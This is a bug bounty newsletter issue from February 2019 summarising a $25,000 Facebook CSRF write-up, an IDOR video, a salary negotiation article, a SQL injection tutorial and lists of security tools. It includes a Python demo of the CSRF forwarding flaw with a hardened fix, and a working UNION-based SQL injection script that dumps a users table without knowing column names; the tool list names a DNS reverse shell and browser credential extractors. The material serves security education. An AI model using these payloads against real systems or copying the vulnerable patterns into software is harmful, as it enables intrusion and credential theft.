Bug Bytes #6 - 25k Facebook CSRF, how to get IDOR, a raise and more!

By Intigriti

February 19, 2019

Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series are curated by Mariem, better known as PentesterLand. Every week, she keeps us updated with a comprehensive list of all write-ups, tools, tutorials and resources we should not have missed.

Sign up for the newsletter here.

Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.
This issue covers the week from February 8 to February 15.

Our favorite 5 hacking items

1. Tool of the week

Dnsgrep & Tutorial

This is a great new tool for quickly searching large DNS datasets like those from the Rapid7 Project Sonar.
It’s like grep except it can search dozens of gigabytes of data really fast.
You can either install it and use it locally, or use the online version. But the author said he will likely take down the online service in the future.

2. Writeup of the week

CSRF on Facebook

This is what a $25,000 bug on Facebook looks like!
The URL https://www.facebook.com/comet/dialog_DONOTUSE/?url=XXXX triggers a POST request to whatever relative path is specified in XXXX. The problem is that the endpoint automatically adds the logged-in user's CSRF token to that request body, so the forwarded POST passes the CSRF check even though the attacker never knew the token.
In other words, a single GET to this URL lets an attacker execute any other POST request on the victim's behalf while bypassing CSRF protections. The writeup details many different ways to exploit it: deleting other users' accounts, posting on someone else's timeline, deleting profile pictures and, most importantly, performing account takeovers.
This is a great example of a well written detailed writeup, which includes business impacts and technical details. The bounty is well deserved!
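To make the pattern concrete, here is an added example (not code from the writeup or from Facebook) of a small in-memory app with a CSRF-protected POST endpoint and a "dialog" endpoint that forwards to a relative path. The app, its paths (/timeline/post, /dialog/share), the token name csrf_token and the allowlist are all made up for this illustration; only the shape of the bug mirrors the one described above. The vulnerable forwarder attaches the session's token itself, so a cross-site GET is enough; the hardened version requires the token on the dialog request and only forwards to an allowlist.

```python
from urllib.parse import urlsplit, parse_qsl
import secrets

# Hypothetical allowlist of paths the dialog endpoint is allowed to forward to.
ALLOWED_DIALOG_TARGETS = {"/dialog/share"}


class TimelineApp:
    """Constructed stand-in for a logged-in web app: one session, one CSRF token."""

    def __init__(self):
        self.csrf_token = secrets.token_hex(16)  # per-session anti-CSRF token
        self.posts = []

    def post(self, path, body):
        """State-changing endpoint: requires the session's CSRF token in the body."""
        if body.get("csrf_token") != self.csrf_token:
            return 403, "invalid or missing CSRF token"
        if path == "/timeline/post":
            self.posts.append(body.get("message", ""))
            return 200, "posted"
        if path == "/dialog/share":
            return 200, "share dialog"
        return 404, "unknown endpoint"

    def dialog_vulnerable(self, url):
        """GET /dialog?url=<relative path>: turns the query string into a POST body
        and, fatally, adds the session's CSRF token on the caller's behalf."""
        parts = urlsplit(url)
        body = dict(parse_qsl(parts.query))
        body["csrf_token"] = self.csrf_token  # the bug: any target now passes the check
        return self.post(parts.path, body)

    def dialog_hardened(self, url, csrf_token=None):
        """Same forwarder, fixed: the dialog request itself must prove it is not
        cross-site, and only known dialog endpoints may be targeted."""
        if csrf_token != self.csrf_token:
            return 403, "dialog request itself must carry the CSRF token"
        parts = urlsplit(url)
        if parts.scheme or parts.netloc:
            return 400, "only relative paths are accepted"
        if parts.path not in ALLOWED_DIALOG_TARGETS:
            return 400, "target is not a dialog endpoint"
        body = dict(parse_qsl(parts.query))
        body["csrf_token"] = csrf_token
        return self.post(parts.path, body)


def attacker_link():
    """What a malicious page would make the victim's browser fetch (constructed).
    Cookies ride along with a top-level GET, so the attacker never needs the token."""
    return "/timeline/post?message=I+was+CSRFed"


def demo_vulnerable():
    app = TimelineApp()
    direct = app.post("/timeline/post", {"message": "no token"})  # blocked: 403
    via_dialog = app.dialog_vulnerable(attacker_link())             # succeeds: 200
    return direct[0], via_dialog[0], app.posts


def demo_hardened():
    app = TimelineApp()
    cross_site = app.dialog_hardened(attacker_link())                                 # 403
    wrong_target = app.dialog_hardened("/timeline/post?message=x", app.csrf_token)    # 400
    legit = app.dialog_hardened("/dialog/share?id=1", app.csrf_token)                 # 200
    return cross_site[0], wrong_target[0], legit[0], app.posts


if __name__ == "__main__":
    print("vulnerable:", demo_vulnerable())
    print("hardened:  ", demo_hardened())
```

The lesson generalises beyond this bug: any endpoint that forwards or replays requests on the user's behalf is itself a state-changing endpoint and must enforce the same origin and token checks as the endpoints it can reach.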

3. Video of the week

Web Security 101 – Insecure Direct Object Reference – You are who you say you are, right?

PwnFunction is an excellent YouTube channel for anyone interested in web app hacking. The style reminds me of a mix between Hacker101 and LiveOverflow.
This particular video explains how IDOR works, its relationship to forced browsing and HTTP parameter pollution, what to do when you find an IDOR but cannot exploit it, how to bypass checks, etc.
Also, I love the humor… “Most of you might add a single or double quote at the end (of a URL like website.com/…?user_id=12) because it’s just an OCD thing at this point” 😀

4. Non technical item of the week

Salary Negotiation Tips from White Men in Tech: Part 1

This is a must-read article for any woman in this industry.
I don’t understand why, but we generally have a tendency to ask for lower salaries than men. I noticed this from my own experience in two different countries (in Europe and Africa), and also from interviewing people. Men with far fewer qualifications than the women we finally hired were asking for much higher salaries.
When I was interviewed for my last job as a consultant, I was able to get a really good salary only thanks to my husband. He coached me on what to ask for, how to negotiate, the minimal salary that I would accept, etc. And the minimum he told me was sky high in my mind and I was very uncomfortable asking for that. But guess what… I got it and deserved it considering the job that I had to do!
So if you are looking for a job or for a raise, and you have trouble asking for what you’re really worth, the tangible advice in this article could help a lot.

5. Tutorial of the week

[SQLi] Extracting data without knowing column names & Similar technique

This is a great tutorial on how to exploit an SQL injection without knowing the column names.
You might need this when you can’t get column names because a WAF blocks queries to information_schema and brute-forcing the names doesn’t work.
The trick is to query select 1,2,3,4,5,6 union select * from users; instead of select * from users;. The first SELECT in a UNION decides the result’s column names, so every real column of users becomes addressable by its position (1 to 6) without ever learning what it is actually called.
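The following is an added example (not code from the tutorial) that runs the technique end to end against a constructed SQLite database: a deliberately injectable article lookup, a users table whose column names the attacker does not know, a probe that discovers the column count from the UNION column-mismatch error instead of information_schema, and the positional extraction itself. Table and column names (articles, users, uid, login, pw_hash) and the sample rows are made up. MySQL lets you reference the positional names directly, as in select `3` from (select 1,2,3 union select * from users)a; SQLite needs explicit aliases, so the dummy row is written as 1 AS c1, 2 AS c2, ... here.

```python
import sqlite3


def build_db():
    """Constructed target: an injectable app table plus a users table the attacker wants."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO articles VALUES (1, 'hello');
        CREATE TABLE users (uid INTEGER PRIMARY KEY, login TEXT, pw_hash TEXT);
        INSERT INTO users VALUES (1, 'alice', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO users VALUES (2, 'bob',   '098f6bcd4621d373cade4e832627b4f6');
    """)
    return conn


def lookup_article(conn, user_input):
    """Deliberately vulnerable: user input is concatenated straight into the query."""
    sql = f"SELECT title FROM articles WHERE id = {user_input}"
    return [row[0] for row in conn.execute(sql).fetchall()]


def probe_column_count(conn, table="users", max_cols=16):
    """How many columns does `table` have? A UNION whose halves disagree on the
    column count is a hard error, so the first n that runs cleanly is the answer."""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(f"NULL AS c{i}" for i in range(1, n + 1))
        payload = (
            f"0 UNION ALL SELECT NULL FROM "
            f"(SELECT {nulls} UNION ALL SELECT * FROM {table}) AS t"
        )
        try:
            lookup_article(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue  # "SELECTs to the left and right of UNION ALL do not have the same number of result columns"
    return None


def dump_column(conn, position, ncols, table="users"):
    """Read column `position` (1-based) of `table` without knowing its name.
    The literal row 1..ncols gives every column a positional alias, UNION ALL
    stacks the real rows underneath it, and OFFSET 1 drops the marker row."""
    aliased = ", ".join(f"{i} AS c{i}" for i in range(1, ncols + 1))
    payload = (
        f"0 UNION ALL SELECT c{position} FROM "
        f"(SELECT {aliased} UNION ALL SELECT * FROM {table} LIMIT 1000 OFFSET 1) AS t"
    )
    return lookup_article(conn, payload)


def dump_table(conn, table="users"):
    """Whole table, one positional column at a time, re-assembled into rows."""
    ncols = probe_column_count(conn, table)
    columns = [dump_column(conn, i, ncols, table) for i in range(1, ncols + 1)]
    return list(zip(*columns))


if __name__ == "__main__":
    db = build_db()
    print("columns in users:", probe_column_count(db))
    for row in dump_table(db):
        print(row)
```

Note that nothing here touches information_schema, sqlite_master or any column name: the only things the payload needs are the table name and a way to tell a column-count error from a successful query.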

Other amazing things we stumbled upon this week

Videos

Podcasts

Webinars & Webcasts

Conferences

Slides only

Tutorials

Medium to advanced

Beginners corner

Writeups

Challenge writeups

Pentest writeups

Responsible disclosure writeups

Bug bounty writeups

See more writeups on The list of bug bounty writeups.

Tools

If you don’t have time

  • Aurebesh.js: Translate JavaScript to other writing systems

  • Gorsair: A penetration testing tool for discovering and remotely accessing the exposed Docker APIs of vulnerable Docker containers

  • Hasherbasher: SQL injection via bruteforced MD5 hash reflection of random strings

  • Dnsdmpstr: Unofficial API & Client for dnsdumpster.com and hackertarget.com. Wrapper around only their free IP tools. Quick & lazy enumeration in one command

More tools, if you have time

  • Vhost-finder: Virtual host finder made in PHP

  • Uptux: Privilege escalation checks for Linux systemd

  • Chashell & Introduction: Reverse Shell over DNS

  • CookieMonster: C# tool for extracting cookie and credential data from browsers (currently only Google Chrome)

  • SecureCodeBox: A docker based environment for continuous security scans. Out of the box support for Nmap, Nikto, SSLyze, SQLMap, Arachni, WPScan & Amass (also compatible with Burp Suite)

  • Freevulnsearch: Free and open NMAP NSE script to query vulnerabilities via the cve-search.org API

  • Pubsploit.py: Quick and dirty script to search for public exploits based on a CVE

  • Get-NetNTLM: Powershell module to get the NetNTLMv2 hash of the current user. “RCE as a low priv user and no credentials? Use Get-NetNTLM to get a crackable NetNTLMv2 hash”

  • Napper-for-tpm: TPM vulnerability checking tool for CVE-2018-6622. This tool will be published at Black Hat Asia 2019

Misc. pentest & bug bounty resources

Challenges

Articles

News

Breaches & Vulnerabilities

Malicious apps/sites

Other news

Non technical

Tweeted this week

We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 01/25/2019 to 02/01/2019.

Curated by Pentester Land & Sponsored by Intigriti
